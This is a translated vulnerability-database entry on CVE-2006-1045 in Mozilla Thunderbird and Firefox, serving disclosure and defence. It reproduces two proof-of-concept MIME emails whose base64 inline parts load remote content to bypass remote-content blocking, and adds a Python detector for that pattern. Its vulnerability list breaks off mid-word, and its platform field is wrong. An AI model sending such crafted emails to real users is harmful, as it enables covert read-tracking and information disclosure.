Mozilla Suite/Firefox/SeaMonkey/Thunderbird Multiple Remote Security Vulnerabilities

Vulnerability ID: 1109830
Vulnerability type: Design error
Published: 2006-02-28
Updated: 2007-09-05
CVE ID: CVE-2006-1045
CNNVD-ID: CNNVD-200603-084
Platform: PHP
CVSS score: 2.6
|Vulnerability source
https://www.exploit-db.com/exploits/27337
https://www.securityfocus.com/bid/16881
https://cxsecurity.com/issue/WLB-2006030014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-084
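|Vulnerability details
Mozilla Suite, Firefox, SeaMonkey and Thunderbird are web browser and mail/newsgroup client products released by Mozilla. These products contain multiple security vulnerabilities, as follows:
1) An attacker may cause a denial of service or execute arbitrary code through DHTML-related attacks.
2) Mozilla/Firefox and Thunderbird do not correctly handle the CSS "letter-spacing" unit. By specifying a very large value, an attacker can overflow an integer during memory allocation, leading to a heap overflow. An attacker who successfully exploits this vulnerability can execute arbitrary code.
3) A remote attacker can inject a target file name into a text box and then convert that text box into a file upload control, or change the "y" type related to the event handler, leading to arbitrary files being read.
4) An attacker can use the crypto.generateCRMFRequest method to run arbitrary code with the user's privileges, possibly installing malware.
5) If the user views a page in "Print Preview", an attacker can use scripts in XBL controls to gain chrome privileges.
6) An attacker can execute arbitrary code through an invalid and inconspicuous sequence of table-related tags that can produce a negative array index.
7) An attacker can use setTimeout() and the new Firefox 1.5 array method ForEach to bypass the security check in js_ValueToFunctionObject() and gain elevated privileges.
8) The interaction of XUL content windows with the new faster history mechanism in Firefox 1.5 can cause those windows to become translucent. An attacker can exploit this to trick the user into interacting with window UI that cannot be seen, leading to arbitrary code execution.
9) If .valueOf.call() and .valueOf.apply() are called with no arguments, these functions return the Object class prototype rather than the caller's global window object. If an accessible property of another window is called, this allows an attacker to bypass same-origin protection and inject script into another window.
10) nsHTMLContentSink.cpp has a memory corruption vulnerability when parsing a specially crafted sequence of HTML tags, which allows an attacker to control a function pointer reference from the stack and ultimately execute arbitrary code.
11) An attacker can use the window.controllers array to bypass same-origin protection and inject script into another site. This may allow a malicious page to steal information such as cookies or passwords. If the user is already logged in, it can also perform actions on behalf of that user.
12) The compilation scope of privileged embedded XBL bindings is not correctly protected; an attacker can, by calling valueOf.call() and valueOf.apply(), or to the DOM's docume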
|Exploit
source: http://www.securityfocus.com/bid/16881/info

Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages.

These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages.

Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected.

* Iframe Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af@sysdream.com" width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--


* CSS Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af@sysdream.com" /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--
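
A mail-gateway style check for the structure both messages above share: an HTML body that pulls in an attached text/html or text/css part by cid:, where that attached part in turn references a remote URL. This is an added example, not code from the advisory or from Mozilla; the function names, the example.test names and the sample message are constructed for illustration.

```python
import base64
import email
import re
from email import policy
# Remote fetches inside HTML or CSS: src=/href= attributes, url(...), @import "..."
REMOTE_REF = re.compile(
    r"""(?:src|href)\s*=\s*["']?\s*(https?://[^"'\s>]+)"""
    r"""|url\(\s*["']?\s*(https?://[^"')\s]+)"""
    r"""|@import\s+["'](https?://[^"']+)""",
    re.IGNORECASE)
CID_REF = re.compile(r"""cid:([^"'\s>)]+)""", re.IGNORECASE)

def find_cid_remote_loads(raw):
    """Return [(content_id, content_type, [urls])] for cid:-referenced parts that load remote URLs."""
    msg = email.message_from_string(raw, policy=policy.default)
    referenced, inline = set(), {}
    for part in msg.walk():
        ctype = part.get_content_type()
        if part.is_multipart() or ctype not in ("text/html", "text/css"):
            continue
        text = part.get_content()          # decodes base64 / quoted-printable
        cid = part.get("Content-ID")
        if cid:
            inline[cid.strip().strip("<>")] = (ctype, text)
        if ctype == "text/html":
            referenced.update(CID_REF.findall(text))
    findings = []
    for cid in sorted(referenced & inline.keys()):
        ctype, text = inline[cid]
        urls = [next(g for g in m.groups() if g) for m in REMOTE_REF.finditer(text)]
        if urls:
            findings.append((cid, ctype, urls))
    return findings

def constructed_message(inline_type, inline_body):
    """Constructed sample: HTML body pointing at one base64 inline part by cid:."""
    b64 = base64.b64encode(inline_body.encode()).decode()
    return (
        "Subject: constructed sample\nMIME-Version: 1.0\n"
        'Content-Type: multipart/related; boundary="b"\n\n'
        "--b\nContent-Type: text/html\n\n"
        '<html><head><link rel="stylesheet" href="cid:part1@example.test">'
        "</head><body></body></html>\n"
        f"--b\nContent-Type: {inline_type}\nContent-Transfer-Encoding: base64\n"
        f"Content-ID: <part1@example.test>\n\n{b64}\n--b--\n")

if __name__ == "__main__":
    css = "@import url(http://tracker.example.test/t.css);"
    print(find_cid_remote_loads(constructed_message("text/css", css)))
```

The attached part has to be decoded before it is scanned, because the remote reference sits behind the base64 transfer encoding and never appears in the raw message text.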
|Affected products
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
|References

Source: BID
Name: 16881
Link: http://www.securityfocus.com/bid/16881
Source: HP
Name: HPSBUX02156
Link: http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
Source: BUGTRAQ
Name: 20060228 Mozilla Thunderbird: Multiple Information Disclosure Vulnerabilities
Link: http://www.securityfocus.com/archive/1/426347
Source: XF
Name: thunderbird-inline-information-disclosure(24959)
Link: http://xforce.iss.net/xforce/xfdb/24959
Source: UBUNTU
Name: USN-276-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-276-1
Source: BID
Name: 17516
Link: http://www.securityfocus.com/bid/17516
Source: REDHAT
Name: RHSA-2006:0330
Link: http://www.redhat.com/support/errata/RHSA-2006-0330.html
Source: SUSE
Name: SUSE-SA:2006:004
Link: http://www.novell.com/linux/security/advisories/2006_04_25.html
Source: www.mozilla.org
Link: http://www.mozilla.org/security/announce/2006/mfsa2006-26.html
Source: MANDRIVA
Name: MDKSA-2006:078
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:078